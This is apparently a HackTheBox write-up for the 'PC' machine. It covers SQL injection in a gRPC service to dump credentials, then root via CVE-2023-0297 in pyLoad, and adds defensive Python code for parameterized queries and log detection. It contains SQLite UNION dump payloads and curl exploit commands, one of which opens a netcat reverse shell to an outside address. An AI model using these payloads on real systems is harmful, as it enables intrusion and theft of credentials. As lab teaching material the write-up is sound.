PC — HackTheBox

Abdul Wassay (Hot Plugin)
5 min read · Oct 6, 2023


PC is an easy machine from HackTheBox. It involves identifying and exploiting a SQL injection in a gRPC service to dump the database for a foothold, then exploiting CVE-2023-0297 (pre-auth RCE in pyLoad) to escalate privileges to root.

NMAP

PORT      STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown

Port 50051

Connecting to port 50051 gives the following error after some time. Googling the error identifies the service running on this port.

Google shows that it's a gRPC service.

gRPC is a modern, open source, high-performance remote procedure call (RPC) framework that can run anywhere. gRPC enables client and server applications to communicate transparently, and simplifies the building of connected systems.

We can interact with the service using gRPC UI.

Download the grpcui binary and run it:

./grpcui -plaintext 10.10.11.214:50051

Now, in the browser, we can interact with the service and invoke calls.

I provided admin:admin as the username and password for the LoginUser method and got the following response.

Now, changing the method to getInfo, I provided the id and token that we got when logging in.

It gave the following message.

SQL Injection

Going back again and adding a ' to the id,

it gives the following error. From the error message, it seems to be a Python application.

Now we can confirm that it's vulnerable to SQL injection by adding a SQL comment,

and this time it works normally.

The next step is to identify the number and type of columns being returned. The following payload shows that only one column is returned.

Next, we determine that it's a SQLite database, and using the following payload we find that there are two tables (accounts and messages) in the db.

101 UNION SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -

The accounts table is interesting. Using the following payload, the columns in the table can be determined.

101 UNION SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='accounts'-- -

Finally, using the following payload, we dump the accounts table and get two sets of credentials: one that we already know and one that is new.

101 UNION SELECT group_concat(username || ":" || password,";") from accounts-- -
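The injection above works because the id is pasted into the SQL text. The following Python script is an added example, not code from the writeup or from the PC machine: it rebuilds the situation against an in-memory SQLite database with constructed accounts and messages rows, runs the writeup's dump payload against a vulnerable handler and a parameterized one, and shows a handler that returns a generic error instead of the Python traceback the writeup used to fingerprint the backend. The table and column names follow the writeup; the row contents, the function names and the use of single-quoted string literals in the payload are assumptions.

```python
import sqlite3

# Constructed sample rows, not the box's real data.
SAMPLE_ACCOUNTS = [("admin", "admin"), ("sau", "constructed-secret")]
SAMPLE_MESSAGES = [(1, "constructed message for id 1")]

# The union payload from the writeup, with the string literals written
# single-quoted so it does not depend on SQLite's double-quoted-string quirk.
DUMP_PAYLOAD = (
    "101 UNION SELECT group_concat(username || ':' || password, ';') "
    "from accounts-- -"
)


def build_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE messages (id INTEGER, message TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    conn.executemany("INSERT INTO messages VALUES (?, ?)", SAMPLE_MESSAGES)
    conn.commit()
    return conn


def get_info_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Anti-pattern: the caller-supplied id is spliced into the SQL text.

    A value such as 1' breaks the statement (the error seen in the writeup),
    and a UNION payload appends rows from any other table.
    """
    query = f"SELECT message FROM messages WHERE id = {user_id}"
    return [row[0] for row in conn.execute(query).fetchall()]


def get_info_fixed(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened: validate the type, then bind the value as a parameter.

    The id is converted to int before it goes near SQL, and the driver
    substitutes the placeholder, so input can never change the statement.
    """
    numeric_id = int(user_id)  # ValueError on anything that is not an integer
    rows = conn.execute(
        "SELECT message FROM messages WHERE id = ?", (numeric_id,)
    ).fetchall()
    return [row[0] for row in rows]


def handle_get_info(conn: sqlite3.Connection, user_id: str) -> dict:
    """Request-handler shape: never echo raw exception text to the client.

    The writeup identified a Python backend from a leaked error; a generic
    message keeps that detail server-side (log the exception instead).
    """
    try:
        return {"ok": True, "messages": get_info_fixed(conn, user_id)}
    except (ValueError, sqlite3.Error):
        # In a real service, log the exception with a request id here.
        return {"ok": False, "error": "invalid request"}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id:", get_info_vulnerable(db, "1"))
    print("vulnerable, payload  :", get_info_vulnerable(db, DUMP_PAYLOAD))
    print("fixed, normal id     :", handle_get_info(db, "1"))
    print("fixed, payload       :", handle_get_info(db, DUMP_PAYLOAD))
```

Running it shows the vulnerable handler returning the joined username:password pairs from the accounts table for the payload, while the fixed handler returns only a generic error for the payload and for the single-quote probe. Type validation plus parameter binding is the fix; the generic error response is a separate control that removes the traceback leak.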

Using the new credentials, we can log in via SSH.

Privilege Escalation

Checking the listening ports, it seems that port 8000 is open internally.

Curling the URL, it redirects to some sort of login page.

We can forward this port to our host to test it further:

ssh -L 8000:127.0.0.1:8000 sau@10.10.11.214

and access it on localhost. It's the pyLoad login page.

Pyload is a free and open source download manager written in Python and designed to be extremely lightweight, easily extensible and fully manageable via web.

The credentials we already have do not work. Searching on Google, it can be found that it's vulnerable to CVE-2023-0297.

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

We can confirm the vulnerability by checking the version,

and also by exploiting it using the provided payload:

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"id%20>%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'

Finally, we can get a reverse shell or just read the flag. I got the reverse shell using the following payload:

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.82%20443%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'
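The requests above have a recognisable shape: a POST to /flash/addcrypted2 whose jk parameter contains a js2py pyimport statement rather than the plain JavaScript function that Click'n'Load normally sends. The script below is an added example, not code from the writeup or from pyLoad, showing detection logic a defender could run over recorded request bodies. It assumes a reverse proxy or WAF logs the method, path and form body; the first record reuses the exploit body from the writeup, the other two are constructed benign requests, and the function names and the pattern list are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed request records: (method, path, raw form body).
# Record 0 is the exploit body quoted in the writeup above; records 1 and 2
# are constructed benign traffic.
SAMPLE_REQUESTS = [
    ("POST", "/flash/addcrypted2",
     "jk=pyimport%20os;os.system(\"id%20>%20/tmp/pwnd\");f=function%20f2(){};"
     "&package=xxx&crypted=AAAA&&passwords=aaaa"),
    ("POST", "/flash/addcrypted2",
     "jk=function%20f(){%20return%20%27abcd%27;%20}"
     "&package=demo&crypted=AAAA&passwords=aaaa"),
    ("GET", "/login", ""),
]

# js2py's pyimport statement is the bridge the exploit relies on; a normal
# jk value is a JavaScript function that returns a decryption key.
SUSPICIOUS_JK = re.compile(r"\bpyimport\b|\bos\.system\b|\bsubprocess\b")


def inspect_request(method: str, path: str, body: str):
    """Return a reason string if the request looks like CVE-2023-0297 abuse, else None."""
    if method != "POST" or path != "/flash/addcrypted2":
        return None
    # parse_qs percent-decodes once; the extra unquote also catches
    # double-encoded variants of the same statement.
    fields = parse_qs(body, keep_blank_values=True)
    for jk in fields.get("jk", []):
        decoded = unquote(jk)
        match = SUSPICIOUS_JK.search(decoded)
        if match:
            return f"addcrypted2 jk parameter contains {match.group(0)!r}"
    return None


def scan(requests) -> list:
    """Return (index, reason) for every flagged request in the given records."""
    hits = []
    for index, record in enumerate(requests):
        reason = inspect_request(*record)
        if reason:
            hits.append((index, reason))
    return hits


if __name__ == "__main__":
    for index, reason in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {reason}")
```

Only the first record is flagged. This is a compensating control for spotting attempts in logs; the actual fix is upgrading pyLoad to a release containing the patch for CVE-2023-0297, which stops the jk script from reaching Python through js2py's pyimport (js2py exposes this as disable_pyimport()).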
